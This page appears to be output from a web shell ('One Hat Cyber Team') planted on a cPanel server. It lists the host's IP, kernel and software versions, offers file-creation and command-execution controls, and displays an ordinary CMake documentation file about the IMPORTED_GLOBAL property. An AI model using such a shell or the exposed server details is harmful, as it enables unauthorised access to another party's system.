⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.23
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Server Software:
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
cmake3
/
Help
/
prop_tgt
/
View File Name :
IMPORTED_GLOBAL.rst
IMPORTED_GLOBAL --------------- Indication of whether an :ref:`IMPORTED target <Imported Targets>` is globally visible. The boolean value of this property is True for targets created with the ``IMPORTED`` ``GLOBAL`` options to :command:`add_executable()` or :command:`add_library()`. It is always False for targets built within the project. For targets created with the ``IMPORTED`` option to :command:`add_executable()` or :command:`add_library()` but without the additional option ``GLOBAL`` this is False, too. However, setting this property for such a locally ``IMPORTED`` target to True promotes that target to global scope. This promotion can only be done in the same directory where that ``IMPORTED`` target was created in the first place. Once an imported target has been made global, it cannot be changed back to non-global. Therefore, if a project sets this property, it may only provide a value of True. CMake will issue an error if the project tries to set the property to a non-True value, even if the value was already False.